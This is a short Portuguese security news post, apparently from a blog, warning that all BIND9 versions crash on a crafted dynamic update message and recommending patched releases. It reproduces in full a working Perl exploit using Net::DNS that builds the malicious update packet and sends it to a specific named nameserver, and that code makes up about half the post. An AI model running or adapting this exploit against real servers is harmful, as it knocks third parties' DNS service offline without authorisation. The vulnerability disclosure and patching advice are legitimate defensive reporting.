Atenção: Nova vulnerabilidade no BIND9 exige atualização imediata
Enviado por Pablo Hess (phessΘlinuxmagazine·com·br):
Todas as versões do BIND9 estão comprometidas. Recomenda-se fortemente instalar as atualizações 9.4.3-P3, 9.5.1-P3 ou 9.6.1-P1. Algumas distribuições, como Debian e Ubuntu, já oferecem versões atualizadas.
A vulnerabilidade é desencadeada após o servidor receber uma mensagem de atualização dinâmica (“dynamic update message”) especialmente criada. Algo que aumenta a gravidade do problema é o fato de que o exploit funciona mesmo que o servidor esteja configurado para não responder a mensagens de atualização dinâmica.” [referência: linuxmagazine.com.br]
#!/usr/bin/perl -w
use Net::DNS;
our $NSI = ‘prmns.lg.co.kr’;
our $NSI_KEY_NAME = ‘domain’;
our $NSI_KEY = ”;
my $rzone = ’4.166.136.in-addr.arpa’;
my $rptr = “70.$rzone”;
my $packet = Net::DNS::Update->new($rzone);
$packet->push(
pre => Net::DNS::RR->new(
Name => $rptr,
Class => ‘IN’,
Type => ‘ANY’,
TTL => 0,
)
);
$packet->push(
update => Net::DNS::RR->new(
Name => $rptr,
Class => ‘ANY’,
Type => ‘ANY’,
)
);
$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);
http://farm1.static.flickr.com/58/225330054_61090d7a19.jpg